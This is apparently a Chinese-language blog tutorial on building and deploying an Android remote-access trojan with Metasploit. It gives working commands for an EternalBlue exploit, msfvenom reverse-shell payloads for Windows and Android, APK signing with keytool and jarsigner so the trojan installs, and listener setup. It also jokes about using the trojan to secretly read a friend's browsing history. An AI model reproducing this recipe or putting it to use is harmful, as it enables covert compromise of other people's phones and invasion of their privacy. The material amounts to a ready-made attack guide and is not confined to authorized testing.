大家好,我是Dest1ny。
今天我们是红队专题中的远控安卓。
这个实验会非常有趣,大家多多点赞!
环境:
一台有公网ip的vps / kali / 带msf工具即可
一台安卓手机(最好老一点,因为我们这里不涉及免杀)
CLASS-1 msfconsole 和 msfvenom
msfconsole
- 功能:
msfconsole
是 Metasploit 框架的主要命令行界面,是一个功能全面且强大的控制台。它用于执行各种攻击操作,包括漏洞扫描、漏洞利用、后期渗透等。 - 特点:
- 允许用户浏览、选择和执行可用的漏洞利用模块(Exploit Modules)。
- 可以设置Payload(恶意代码)、编码器(Encoders)、监听器(Listeners)等参数。
- 支持通过插件和脚本扩展功能,如
post-exploitation
模块、漏洞扫描插件等。 - 支持与其他工具集成,方便进行信息收集、漏洞扫描、提权和持久化等任务。
- 使用场景:
- 当你想要选择和执行漏洞利用时,可以通过
msfconsole
加载模块、配置参数,并执行攻击。 - 适合实时操作和渗透测试人员互动操作。
- 当你想要选择和执行漏洞利用时,可以通过
msfconsole
进入控制台后,可以使用例如以下命令:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
msfvenom
- 功能:
msfvenom
是 Metasploit 用于生成攻击Payload的工具,它将之前的msfpayload
和msfencode
工具合并为一个单独的工具。主要用于生成可用于漏洞利用的有效载荷(Payload)。 - 特点:
- 允许用户自定义Payload,并指定生成的格式(如
exe
,elf
,apk
,raw
等)。 - 支持对Payload进行编码和混淆,以绕过杀毒软件或检测机制。
- 生成后的Payload可以与其他工具(如
msfconsole
)一起使用,或直接用于恶意软件开发。
- 允许用户自定义Payload,并指定生成的格式(如
- 使用场景:
- 当你需要生成特定的Payload(如反向shell、绑定shell、下载执行器等)时,可以使用
msfvenom
自定义Payload参数并生成对应的文件。 - 适合用来制作免杀Payload、混淆恶意软件,或在渗透测试中注入漏洞利用代码。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
- 当你需要生成特定的Payload(如反向shell、绑定shell、下载执行器等)时,可以使用
- 这条命令将生成一个反向TCP连接的Windows Meterpreter Payload,并保存为一个可执行文件
payload.exe
。
总结
msfconsole
: 用于管理和执行漏洞利用的交互式控制台。msfvenom
: 用于生成和编码恶意Payload的工具。
CLASS-2 制作安卓木马
我们先使用msfvenom去制作木马!
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.209 LPORT=4444 R > Dest1ny.apk
这里的lhost使用本地的ip,lport是你想去监听的端口
CLASS-3 apk签名
为什么要apk签名?
APK需要签名的原因主要有以下几点:
-
验证完整性:签名确保APK未被篡改。如果APK文件被修改,签名验证将失败,系统会阻止安装。
-
开发者身份:签名帮助识别应用程序的开发者,确保应用来自可信来源,防止恶意软件冒充合法应用。
-
权限管理:通过签名,应用可以安全地共享权限和数据。如果两个应用具有相同签名,可以相互访问数据。
-
安全分发:在官方应用商店发布的APK必须签名,以减少恶意软件传播的风险。
-
防伪造:签名防止攻击者伪造应用,确保只有合法的APK能被安装和运行。
现在我们有一个apk文件,但是不是所有的apk文件都可以传到手机上就可以下载,我们要加入签名才可以。
第一步:使用keytool生成一个key文件。会让你输入该key的名称、单位、地址等等信息,最终生成一个key文件
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
这时候你会有一个my-release-key.Keystore的文件
第二步:使用该key文件配合JARsigner为APK签名
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore Dest1ny.apk alias_name
第三步:然后使用JARsigner验证签名
jarsigner -verify -verbose -certs Dest1ny.apk
CLASS-4 开始远控
使用msfconsole开启Metasploit
进行监听,要提前设置payload
use 7即可mei
没有公网ip,需要攻击机和被害机都在同一局域网下
然后就是设置lhost和lport
还要设置一下payload
android/meterpreter/reverse_tcp
使用你的被害者手机去下载apk文件,因为没有免杀,你要去手动下载!
这时候你就可以去偷偷看朋友的浏览记录了hhhh!
这里就不演示了!
今天肯定不水了!
后面我也会持续去更新内容!
大家多多点赞!!
想到300粉丝了!